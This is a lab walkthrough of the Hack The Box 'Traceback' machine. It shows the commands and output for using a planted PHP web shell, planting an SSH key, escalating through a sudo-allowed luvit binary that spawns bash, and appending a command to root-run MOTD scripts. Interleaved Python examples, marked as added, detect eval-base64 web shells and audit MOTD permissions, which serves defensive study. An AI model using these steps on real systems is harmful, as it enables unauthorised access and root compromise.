Hack The Box : Traceback

24 April, 2020

Discovery

Starting with an Nmap scan

kali@kali:~$ nmap -p 1-10000 -sC -sT -sV 10.10.10.181
Starting Nmap 7.80 ( https://nmap.org ) at 2020-04-14 15:15 EDT
Nmap scan report for 10.10.10.181
Host is up (0.15s latency).
Not shown: 9997 closed ports
PORT    STATE    SERVICE VERSION
22/tcp  open     ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   2048 96:25:51:8e:6c:83:07:48:ce:11:4b:1f:e5:6d:8a:28 (RSA)
|   256 54:bd:46:71:14:bd:b2:42:a1:b6:b0:2d:94:14:3b:0d (ECDSA)
|_  256 4d:c3:f8:52:b8:85:ec:9c:3e:4d:57:2c:4a:82:fd:86 (ED25519)
80/tcp  open     http    Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Help us
876/tcp filtered unknown
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 274.29 seconds

So there's a website

I didn't get any hints from this straightaway so I ran gobuster using a big wordlist but didn't get anything useful from it

kali@kali:~$ ./gobuster dir -u "http://traceback.htb/" -w /usr/share/dirb/wordlists/big.txt 
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url:            http://traceback.htb/
[+] Threads:        10
[+] Wordlist:       /usr/share/dirb/wordlists/big.txt
[+] Status codes:   200,204,301,302,307,401,403
[+] User Agent:     gobuster/3.0.1
[+] Timeout:        10s
===============================================================
2020/04/15 14:16:52 Starting gobuster
===============================================================
/.htaccess (Status: 403)
/.htpasswd (Status: 403)
/server-status (Status: 403)
===============================================================
2020/04/15 14:23:50 Finished
===============================================================

Looking at the source code of the website for hints, there's a comment about web shells

Web shells are a pretty common way of gaining access to systems through websites, more about them here

After digging around some more into the website's contents and its author, I found two repositories on the author's GitHub, Xh4h:

  1. TFSC: Temporary File Source Code disclosure script

tfsc is an automated and standalone tool to find backup files that may disclose the website's source code.

  2. Web-Shells: Some of the best web-shells that you might need

I downloaded the PHP files from 2 and attempted to find them using 1.

kali@kali:~$ python tfsc/tfsc.py -u http://traceback.htb -f alfa3.php,alfav3.0.1.php,andela.php,bloodsecv4.php,by.php,c99ud.php,cmd.php,configkillerionkros.php,jspshell.jsp,mini.php,obfuscated-punknopass.php,punk-nopass.php,punkholic.php,r57.php,smevk.php,wso2.8.5.php

                  ________________________________________
         (__)    /                                        \
         (oo)   (   Temporary File Source Code Disclosure  )
  /-------\/ --' \________________________________________/ 
 / |     ||
*  ||----||             

Loading payloads . . .
[http://traceback.htb/#alfa3.php#] Request code: 200
[http://traceback.htb/#alfav3.0.1.php#] Request code: 200
[http://traceback.htb/#andela.php#] Request code: 200
[http://traceback.htb/#bloodsecv4.php#] Request code: 200
[http://traceback.htb/#by.php#] Request code: 200
[http://traceback.htb/#c99ud.php#] Request code: 200
[http://traceback.htb/#cmd.php#] Request code: 200
[http://traceback.htb/#configkillerionkros.php#] Request code: 200
[http://traceback.htb/#jspshell.jsp#] Request code: 200                                                                              
[http://traceback.htb/#mini.php#] Request code: 200                                                                                  
[http://traceback.htb/#obfuscated-punknopass.php#] Request code: 200                                                                 
[http://traceback.htb/#punk-nopass.php#] Request code: 200                                                                           
[http://traceback.htb/#punkholic.php#] Request code: 200                                                                             
[http://traceback.htb/#r57.php#] Request code: 200                                                                                   
[http://traceback.htb/#smevk.php#] Request code: 200                                                                                 
[http://traceback.htb/#wso2.8.5.php#] Request code: 200                                                                              
144 URLs attempted, 16 files found.

This wasn't of much use: all the above URLs were false positives because they were logically the same as http://traceback.htb. The # just meant a link to an anchor.
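Why every one of those "hits" returned 200, shown as an added example (not part of the original post or of TFSC): everything after the first # is a URL fragment that stays in the client, so the request line only ever carries /. The function names are hypothetical and the report lines are copied from the output above.

```python
import re
from urllib.parse import quote, urlsplit

BASE = "http://traceback.htb/"  # target URL used on the page

# A few report lines copied from the TFSC output shown above.
REPORT = """\
[http://traceback.htb/#alfa3.php#] Request code: 200
[http://traceback.htb/#jspshell.jsp#] Request code: 200
[http://traceback.htb/#smevk.php#] Request code: 200
"""


def request_target(url):
    """Return the path[?query] an HTTP client puts on the request line.

    The fragment is never sent to the server, so it is dropped here too.
    """
    parts = urlsplit(url)
    target = parts.path or "/"
    if parts.query:
        target += "?" + parts.query
    return target


def autosave_url(base, filename, encode=True):
    """Build the URL for an editor autosave name of the form '#file#'.

    With encode=True the '#' characters are percent-encoded as %23, which is
    the only way they can be part of the path instead of starting a fragment.
    """
    name = "#" + filename + "#"
    if encode:
        name = quote(name, safe="")
    return base.rstrip("/") + "/" + name


def triage(report, base=BASE):
    """Split reported hits into (false_positives, worth_checking).

    A hit whose request target equals the base URL's target fetched the
    home page again, not a separate file.
    """
    false_pos, keep = [], []
    for url, _code in re.findall(r"^\[(.+)\] Request code: (\d+)", report, re.M):
        same = request_target(url) == request_target(base)
        (false_pos if same else keep).append(url)
    return false_pos, keep


if __name__ == "__main__":
    fp, keep = triage(REPORT)
    print("false positives:", len(fp), "worth checking:", len(keep))
    print("raw     ->", request_target(autosave_url(BASE, "smevk.php", encode=False)))
    print("encoded ->", request_target(autosave_url(BASE, "smevk.php")))
```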

So I used Gobuster with the above list as a source

kali@kali:~$ ./gobuster dir -u "http://traceback.htb/" -w php.txt 
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url:            http://traceback.htb/
[+] Threads:        10
[+] Wordlist:       php.txt
[+] Status codes:   200,204,301,302,307,401,403
[+] User Agent:     gobuster/3.0.1
[+] Timeout:        10s
===============================================================
2020/04/18 15:01:50 Starting gobuster
===============================================================
/smevk.php (Status: 200)
===============================================================
2020/04/18 15:01:52 Finished
===============================================================

Bingo! Found a valid path to explore.

Looking at the file smevk.php, if you decode the base64 string that is being eval()ed you'll find that it's a bunch of PHP that enables a dashboard
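From the defender's side, the eval-of-base64 construct described above is a useful thing to hunt for in a web root. The following is an added example, not code from the original post or from the web shell: it finds the pattern in PHP source, decodes the payload without executing it, and lists indicators in the decoded text. It goes slightly beyond the page by also unwrapping gzinflate/gzuncompress layers; the sample PHP, the indicator list and all names are constructed for illustration.

```python
import base64
import binascii
import re
import zlib

# eval( [gzinflate( | gzuncompress( ...]  base64_decode( "literal" )
PATTERN = re.compile(
    r"""eval\s*\(\s*
        (?P<wrappers>(?:(?:gzinflate|gzuncompress)\s*\(\s*)*)
        base64_decode\s*\(\s*
        (?P<q>['"])(?P<blob>[A-Za-z0-9+/=\s]+)(?P=q)""",
    re.IGNORECASE | re.VERBOSE,
)

# Strings worth surfacing to an analyst once the payload is readable (assumed list).
INDICATORS = ("$_POST", "$_REQUEST", "$_GET", "system(", "shell_exec(",
              "passthru(", "move_uploaded_file(")


def decode_layers(wrappers, blob):
    """Undo base64, then the decompressors from innermost to outermost."""
    try:
        data = base64.b64decode("".join(blob.split()), validate=True)
    except (binascii.Error, ValueError):
        return None
    for name in reversed(wrappers):
        try:
            if name == "gzinflate":        # raw DEFLATE stream
                data = zlib.decompress(data, -15)
            elif name == "gzuncompress":   # zlib-wrapped stream
                data = zlib.decompress(data)
        except zlib.error:
            return None
    return data.decode("utf-8", errors="replace")


def scan_php(source):
    """Return one finding per eval(...base64_decode("...")) in the source."""
    findings = []
    for m in PATTERN.finditer(source):
        wrappers = [w.lower() for w in re.findall(r"[A-Za-z0-9_]+", m.group("wrappers"))]
        decoded = decode_layers(wrappers, m.group("blob"))
        findings.append({
            "line": source.count("\n", 0, m.start()) + 1,
            "chain": ["eval"] + wrappers + ["base64_decode"],
            "decoded": decoded,
            "indicators": [i for i in INDICATORS if decoded and i in decoded],
        })
    return findings


# --- constructed samples (harmless payload, built at import time) ---
INNER = 'if ($_POST["p"] === "constructed") { echo "dashboard"; }'
PLAIN = '<?php\n// header\neval(base64_decode("%s"));\n' % (
    base64.b64encode(INNER.encode()).decode())

deflater = zlib.compressobj(9, zlib.DEFLATED, -15)
RAW = deflater.compress(INNER.encode()) + deflater.flush()
PACKED = "<?php eval(gzinflate(base64_decode('%s'))); ?>" % (
    base64.b64encode(RAW).decode())

BENIGN = '<?php echo base64_decode("aGVsbG8="); ?>'  # decode without eval

if __name__ == "__main__":
    for label, src in (("plain", PLAIN), ("packed", PACKED), ("benign", BENIGN)):
        print(label, scan_php(src))
```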

User

The credentials to this dashboard are in smevk.php itself : admin ; admin

Using the Change dir option to change the directory to ~/.ssh, I found the authorized_keys file

Using the bottom left button to edit, I added my public key to this file.

Now I could log in using ssh

kali@kali:~/Documents$ ssh webadmin@traceback.htb
The authenticity of host 'traceback.htb (10.10.10.181)' can't be established.
ECDSA key fingerprint is SHA256:7PFVHQKwaybxzyT2EcuSpJvyQcAASWY9E/TlxoqxInU.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added 'traceback.htb,10.10.10.181' (ECDSA) to the list of known hosts.
#################################
-------- OWNED BY XH4H  ---------
- I guess stuff could have been configured better ^^ -
#################################

Welcome to Xh4H land 



Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings

Last login: Sun Apr 19 01:14:12 2020 from 10.10.14.184
webadmin@traceback:~$ ls -ltrh
total 12K
-rw-rw-r-- 1 sysadmin sysadmin 122 Mar 16 03:53 note.txt
webadmin@traceback:~$ cat note.txt 
- sysadmin -
I have left a tool to practice Lua.
I'm sure you know where to find it.
Contact me if you have any question.

lua by itself was not present

webadmin@traceback:~$ lua -v
bash: lua: command not found

webadmin's directories didn't have anything interesting either. I tried to see if I could do anything using sudo and indeed I could execute something very specific.

webadmin@traceback:~$ sudo -l
Matching Defaults entries for webadmin on traceback:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User webadmin may run the following commands on traceback:
    (sysadmin) NOPASSWD: /home/sysadmin/luvit

Luvit is an implementation of Node.js APIs in Lua.

Luvit is a single binary that contains the lua vm, libuv, openssl, miniz as well as a host of standard libraries implemented in lua that closely resemble the public node.js APIs. You give it a lua script to run and it runs it in the context of this system.

You can read more about Luvit here

A very simple Lua script gave me shell as sysadmin

os.execute("/bin/bash -i")
webadmin@traceback:~$ sudo -u sysadmin /home/sysadmin/luvit script.lua
sysadmin@traceback:~$ whoami
sysadmin
sysadmin@traceback:~$ pwd
/home/webadmin
sysadmin@traceback:~$ cd /home/sysadmin/
sysadmin@traceback:/home/sysadmin$ ls -ltrh
total 5.4M
-rwxrwxr-x 1 sysadmin sysadmin 4.2M Aug 24  2019 luvit
-rw------- 1 sysadmin sysadmin   33 Apr 18 23:18 user.txt

There it is...

Root

This time I couldn't run anything using sudo

sysadmin@traceback:~$ sudo -l
[sudo] password for sysadmin:

There was nothing on the crontab

sysadmin@traceback:~$ crontab -l
no crontab for sysadmin

Enumerating sysadmin further, I tried to see what processes were running and after running ps aux multiple times I found this in the output

root       2498  0.0  0.0   4628   780 ?        Ss   04:28   0:00 /bin/sh -c sleep 30 ; /bin/cp /var/backups/.update-motd.d/* /etc/update-motd.d/

/etc/update-motd.d/ is a way to generate dynamic MOTD (Message of the Day), otherwise restricted to the /etc/motd file containing static text

This framework was introduced by Ubuntu so their manual page covers all the details.

An interesting bit of information from the above manual page: motd scripts are executed as root

Executable scripts in /etc/update-motd.d/* are executed by pam_motd(8) as the root user at each login, and this information is concatenated in /var/run/motd

Checking the directory /var/backups/.update-motd.d/

sysadmin@traceback:/home/sysadmin$ cd /var/backups/.update-motd.d/
sysadmin@traceback:/var/backups/.update-motd.d$ ls -ltrh
total 24K
-rwxr-xr-x 1 root root  299 Aug 25  2019 91-release-upgrade
-rwxr-xr-x 1 root root  604 Aug 25  2019 80-esm
-rwxr-xr-x 1 root root 4.2K Aug 25  2019 50-motd-news
-rwxr-xr-x 1 root root  981 Aug 25  2019 00-header
-rwxr-xr-x 1 root root  982 Aug 27  2019 10-help-text
sysadmin@traceback:/var/backups/.update-motd.d$ echo "cat /root/root.txt" >> 00-header 
bash: 00-header: Permission denied

All these files are owned by root so I have no way of manipulating them

Checking the other directory /etc/update-motd.d/

sysadmin@traceback:/var/backups/.update-motd.d$ cd /etc/update-motd.d
sysadmin@traceback:/etc/update-motd.d$ ls -ltrh
total 24K
-rwxrwxr-x 1 root sysadmin  299 Apr 19 11:26 91-release-upgrade
-rwxrwxr-x 1 root sysadmin  604 Apr 19 11:26 80-esm
-rwxrwxr-x 1 root sysadmin 4.2K Apr 19 11:26 50-motd-news
-rwxrwxr-x 1 root sysadmin  982 Apr 19 11:26 10-help-text
-rwxrwxr-x 1 root sysadmin  981 Apr 19 11:26 00-header

Ah-ha, any of these files can be manipulated by sysadmin
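The misconfiguration visible in the two listings, written as an audit check (an added example, not part of the original post): scripts that root executes must not be writable by anyone other than root. The listings are copied from the output above; the function names are hypothetical, and the check assumes uid 0 is named root.

```python
import grp
import os
import pwd
import stat

# Listings copied from the page.
BACKUP_LISTING = """\
total 24K
-rwxr-xr-x 1 root root  299 Aug 25  2019 91-release-upgrade
-rwxr-xr-x 1 root root  604 Aug 25  2019 80-esm
-rwxr-xr-x 1 root root 4.2K Aug 25  2019 50-motd-news
-rwxr-xr-x 1 root root  981 Aug 25  2019 00-header
-rwxr-xr-x 1 root root  982 Aug 27  2019 10-help-text
"""
ETC_LISTING = """\
total 24K
-rwxrwxr-x 1 root sysadmin  299 Apr 19 11:26 91-release-upgrade
-rwxrwxr-x 1 root sysadmin  604 Apr 19 11:26 80-esm
-rwxrwxr-x 1 root sysadmin 4.2K Apr 19 11:26 50-motd-news
-rwxrwxr-x 1 root sysadmin  982 Apr 19 11:26 10-help-text
-rwxrwxr-x 1 root sysadmin  981 Apr 19 11:26 00-header
"""


def write_paths(mode, owner, group):
    """Reasons a root-executed file can be modified by a non-root account."""
    why = []
    if owner != "root":
        why.append("owned by " + owner)
    if mode & stat.S_IWGRP and group != "root":
        why.append("writable by group " + group)
    if mode & stat.S_IWOTH:
        why.append("world-writable")
    return why


def mode_from_ls(perm):
    """Convert an ls permission string such as '-rwxrwxr-x' to mode bits.

    Only the nine rwx positions are read, which is all the write check needs.
    """
    bits = 0
    for i, ch in enumerate(perm[1:10]):
        if ch != "-":
            bits |= 1 << (8 - i)
    return bits


def audit_listing(listing):
    """Audit captured `ls -l` output; returns {filename: [reasons]}."""
    flagged = {}
    for line in listing.splitlines():
        f = line.split()
        if len(f) < 9 or len(f[0]) < 10:
            continue  # skips the 'total' line
        why = write_paths(mode_from_ls(f[0]), f[2], f[3])
        if why:
            flagged[f[8]] = why
    return flagged


def name_of(lookup, ident, field):
    """Resolve a uid/gid to a name, falling back to the number."""
    try:
        return getattr(lookup(ident), field)
    except KeyError:
        return str(ident)


def audit_dir(path="/etc/update-motd.d"):
    """Audit a live directory, including the directory itself (key '.')."""
    flagged = {}
    entries = [path] + [os.path.join(path, n) for n in sorted(os.listdir(path))]
    for entry in entries:
        st = os.stat(entry)
        owner = name_of(pwd.getpwuid, st.st_uid, "pw_name")
        group = name_of(grp.getgrgid, st.st_gid, "gr_name")
        why = write_paths(st.st_mode, owner, group)
        if why:
            flagged[os.path.relpath(entry, path)] = why
    return flagged


if __name__ == "__main__":
    print("backup copy:", audit_listing(BACKUP_LISTING))
    print("live dir   :", audit_listing(ETC_LISTING))
```

The fix the listings point to is root:root ownership with mode 0755 on the directory and every script in it, matching the backup copy.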

sysadmin@traceback:/etc/update-motd.d$ cat 00-header 
#!/bin/sh
#
#    00-header - create the header of the MOTD
#    Copyright (C) 2009-2010 Canonical Ltd.
#
#    Authors: Dustin Kirkland <kirkland@canonical.com>
#
#    This program is free software; you can redistribute it and/or modify
#    it under the terms of the GNU General Public License as published by
#    the Free Software Foundation; either version 2 of the License, or
#    (at your option) any later version.
#
#    This program is distributed in the hope that it will be useful,
#    but WITHOUT ANY WARRANTY; without even the implied warranty of
#    MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
#    GNU General Public License for more details.
#
#    You should have received a copy of the GNU General Public License along
#    with this program; if not, write to the Free Software Foundation, Inc.,
#    51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA.

[ -r /etc/lsb-release ] && . /etc/lsb-release


echo "\nWelcome to Xh4H land \n"
sysadmin@traceback:/etc/update-motd.d$ echo "cat /root/root.txt" >> 00-header

Now all I had to do was ssh into the box again...

kali@kali:~$ ssh webadmin@traceback.htb
#################################
-------- OWNED BY XH4H  ---------
- I guess stuff could have been configured better ^^ -
#################################

Welcome to Xh4H land 

<flag>


Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings

Last login: Sun Apr 19 11:22:58 2020 from 10.10.15.1
.
.
.